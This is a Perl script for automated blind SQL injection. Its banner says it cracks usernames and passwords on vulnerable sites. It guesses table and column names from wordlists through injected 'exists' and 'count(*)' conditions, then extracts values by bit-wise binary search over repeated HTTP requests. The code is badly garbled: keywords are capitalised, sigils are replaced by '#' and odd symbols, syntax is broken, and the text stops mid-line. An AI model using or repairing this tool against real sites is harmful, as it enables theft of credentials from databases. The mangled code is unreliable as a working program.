Note: replace all the records in the Code with $.
#! /Usr/local/ActivePerl-5.8/bin/perl-w
Use IO: Socket;
Use threads;
# Function list;
Sub gethost
{
If (# url = ~ /(Http ://)? (. + ?) /(. + )/)
{
# Host = #2;
# Path =/. #3;
If (# host = ~ /(.*):(.*)/)
{
# Host = #1;
# Port = #2;
}
}
}
Sub fieInput
{
My # field;
Open (fieInput, "_ # [0]") or die "cant open file! ";
While (chomp (my ∮ input = <fieInput> ))
{
My # SQL = "exists % 20 (select % #20 input % 20 from % 20 # table_user )";
# Path1 = "% 20AND % 20 # SQL ";
My @ res = & connect;
If ("@ res" = ~ /∮ Info /)
{
# Field = # input;
Print "+ -- # field -- + ";
Last;
}
}
Close (fieInput );
Return # field;
}
Sub tabInput
{
My # table;
Open (tabInput, "∮ _ [0]") or die "cant open file! ";
While (chomp (my ∮ input = <tabInput> ))
{
My # SQL = "0 <> (select % 20 count (*) % 20 from % 20 # input )";
# Path1 = "% 20AND % 20 # SQL ";
My @ res = & connect;
If ("@ res" = ~ /∮ Info /)
{
# Table = # input;
Print "+ -- # table -- + ";
Last;
}
}
Close (tabInput );
Return # table;
}
Sub connect
{
# Req = "GET # path # path1 HTTP/1.0 ".
"Host: # host ".
"Referer: # host ".
"Cookie :";
My # connection = IO: Socket: INET-> new (Proto => "tcp ",
PeerAddr => # host,
PeerPort => ∮ port) │ die "Sorry! Cocould not connect to ∮ host ";
Print # connection # req;
My @ res = <# connection>;
Close # connection;
Return @ res;
}
Sub crack
{
My (@ dic) = @_;
My # SQL = pop (@ dic );
My # I = 0;
My # op = 1;
My # crack;
Foreach my # pass (@ dic)
{
Print "> ";
# I ++;
# Crack + = # op * # pass;
# Path1 = "% 20AND % 20 # crack <(# SQL )";
My @ res = & connect;
If ("@ res" = ~ /∮ Info /)
{
# Op = 1;
If (# I = @ dic)
{
# Crack ++;
}
}
Else
{
# Op =-1;
}
}
Return # crack;
}
Sub asc
{
My # asc = # _ [0];
My # str;
If (# asc <256)
{
# Str = pack (C *, asc );
}
Else
{
# Asc * =-1;
# Str = sprintf ("% X", # asc );
If (# str = ~ /(. {4}) # I)
{
# Str = #1;
}
# Str = pack ("H *", # str );
}
Return # str;
}
# Initialize variables;
# Url =;
# Host =;
# Path =;
# Info =;
# Port = 80;
@ Dic1 = (, 64 );
@ Dic2 = (16, 8, 4, 2, 1 );
@ Dic3 = (64, 32, 16, 8, 4, 2, 1 );
@ Dic4 = (16384,8192, 4096,2048, 1024,512,256,128, 64,32, 16,8, 1 );
Print "";
Print "* The script Crack user & pass for SQL-injection system *";
Print "* hemon @ East China Jiaotong Univercity, 2004.5 *";
Print "* E-mail: thedomainone @ yahoo.com.cn QQ: 24303484 *";
# Obtain the host address and path;
# ARGC = @ ARGV;
#Url = #argv [0];
# Info = # ARGV [1];
If (# ARGC! = 2)
{
Print "* Please input the url :*";
Chomp (# url = <STDIN> );
Print "* Please input the infomation :*";
Chomp (# info = <STDIN> );
}
& Gethost;
Print "started at # hos